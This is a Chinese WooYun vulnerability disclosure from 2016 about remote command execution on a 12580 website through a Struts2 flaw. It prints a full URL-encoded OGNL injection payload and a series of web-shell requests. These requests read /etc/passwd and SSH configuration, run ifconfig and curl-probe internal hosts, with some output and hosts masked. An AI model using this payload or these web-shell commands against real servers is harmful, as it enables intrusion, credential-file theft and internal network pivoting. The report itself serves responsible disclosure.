当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0206745

漏洞标题:12580某站命令执行已shell可内网渗透

相关厂商:12580

漏洞作者: 重瞳

提交时间:2016-05-09 23:10

修复时间:2016-06-26 17:00

公开时间:2016-06-26 17:00

漏洞类型:命令执行

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-09: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开

简要描述:

一位女施主对人生饱含不惑,所以他就去问禅师。“都说向外看能洞彻世界,向内看能懂得人生,可是,禅师,我怎么向内看不清呢”禅师摸着胡须,端详着看了看这位女施主,语重心长的对他说“你太胖了”

详细说明:

mask 区域
1.http://**.**.**/GetHotelListAction!initc.do  str2命令执行漏洞_
**********
2.http://**.**.**/GetHotelListAction!initc.doredirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22Test by 2%22%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%**.**.**.**.InputStreamReader%28%23b%29%2C%23d%3Dnew%**.**.**.**.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read%28%23e%29%2C%23res.getWriter%28%29.println%28%23e%29%2C%23res.getWriter%28%29.flush%28%29%2C%23res.getWriter%28%29.close%28%29%7D_
**********
**********
*****ll读取*****
**********
3.http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/ssh/ssh_config_
**********
*****dd8b05eb8a75c124cb.png"*****
**********
**********
4.http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/passwd_
**********
**********
*****:/root:/*****
*****bin:/sbi*****
*****:/sbin:/sb*****
*****r/adm:/sb*****
*****ool/lpd:/s*****
*****:/sbin:/*****
*****wn:/sbin:/s*****
*****:/sbin:/*****
*****/spool/mail*****
*****spool/uucp:/*****
*****tor:/root:/*****
*****/usr/games:*****
*****var/gopher:/*****
*****/var/ftp:/s*****
*****body:/:/s*****
*****sage bus:/:/*****
*****/var/cache/rpc*****
*****memory owner:/d*****
*****c/abrt:/sb*****
*****r":/var/empty/*****
*****pool/postfix*****
***** daemon:/:/*****
*****/ntp:/sbi*****
*****ck:/var/run/avahi-*****
***** User:/var/lib*****
***** NFS User:/var/li*****
*****d SSH:/var/empty*****
*****::/:/sbi*****
*****be used by OProfile:/*****
*****home/tomca*****
*****home/yz:*****
*****ome/www:/*****
*****/home/logu*****
**********
**********
5.http://**.**.**/12580.jsppwd=0324&i=ifconfig 执行ifconfig_
*****^在^*****
*****1ecbaff5cae4d0f469.png"*****
**********
*****^^^*****
**********
6.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** 404_
**********
7.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** phpinfo_
*****37399ec3459f75ee7c.png"*****
**********
8.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** tomcat_
**********
*****^个站没^*****

漏洞证明:

来个5wb,我要进社区

修复方案:

不定

版权声明:转载请注明来源 重瞳@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-12 16:53

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无